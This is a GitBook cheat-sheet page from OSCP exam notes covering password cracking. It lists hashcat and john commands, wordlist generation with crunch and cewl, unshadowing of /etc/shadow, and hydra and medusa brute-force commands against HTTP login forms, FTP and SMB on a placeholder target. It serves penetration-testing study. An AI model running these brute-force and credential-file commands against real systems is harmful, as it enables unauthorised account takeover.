🌇
oscp
  • Introduction
  • Chapter 1 - Cheatsheets
  • Chapter 2 - Recon & Enumeration
  • Chapter 3 - Exploiting Vulnerabilities
  • Chapter 4 - Windows Post-Exploitation
  • Chapter 5 - Linux Post-Exploitation
  • Chapter 6 - Exploit Development
  • Chapter 7 - Cracking
  • Chapter 8 - Reverse Engineering
  • Chapter 9 - Miscellaneous
Powered by GitBook
On this page
  • Hash Identification
  • Decoding
  • Wordlist Generation
  • Crunch
  • CEWL
  • John
  • Cracking
  • Hashcat
  • Converting for John attacks
  • John
  • BruteForcing
  • Hydra
  • Medusa

Was this helpful?

Chapter 7 - Cracking

PreviousChapter 6 - Exploit DevelopmentNextChapter 8 - Reverse Engineering

Last updated 4 years ago

Was this helpful?

The time to crack a password is related to bit strength, which is a measure of the password's entropy and the details of how the password is stored. Most methods of password cracking require the computer to produce many candidate passwords, each of which is checked. One example is brute-force cracking, in which a computer tries every possible key or password until it succeeds. More common methods of password cracking, such as dictionary attacks, pattern checking, word list substitution, etc. attempt to reduce the number of trials required and will usually be attempted before brute force. Higher password bit strength exponentially increases the number of candidate passwords that must be checked, on average, to recover the password and reduces the likelihood that the password will be found in any cracking dictionary.

— Wikipedia

looking for contributions to this section. Please DM me on

Hash Identification

Kali> hash-identifier
> HASH64256BLOOBLAHHAHAHEHE

Decoding

Kali> echo"BASE64"| base64 -d
Kali> echo"d3 4d b3 3f"| xxd -r -ps

Wordlist Generation

Crunch

Kali> crunch 6 6 0123456789ABCDEF -o crunch.txt

CEWL

Kali> cewl www.wikipedia.com -m 6 -w passwords.txt

John

Kali> nano /etc/john/john.conf
Kali> john --wordlist=passwords.txt --rules --stdout > mutated

Cracking

Hashcat

Kali> hashcat -m 400 -a 0 hash /usr/share/wordlists/rockyou.txt
Kali> oclHashcat64.bin -m 110 hash.txt ../wordlist.txt --force

Converting for John attacks

Kali> ssh2john file > newfile
Kali> unshadow /etc/passwd /etc/shadow > unshadowed.txt

John

Kali> john crackfile --wordlist=/usr/share/wordlists/rockyou.txt

BruteForcing

Hydra

Kali> hydra -l admin -P /usr/share/wordlists/rockyou.txt $TARGET http-post-form "/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password" -V -I

Kali> hydra -L /path/to/file/usernames.txt -P /path/to/file/passwords.txt $TARGET ftp

Kali>hydra -l administrator -P /path/to/file/passwords.txt -t 1 $TARGET smb
    -t 1 = number of times to try

Medusa

Kali> medusa -h $TARGET -u admin -P passwords.txt -M http -m DIR:/admin -T 10

Twitter
Hashcat man page & hash types
John Hash Types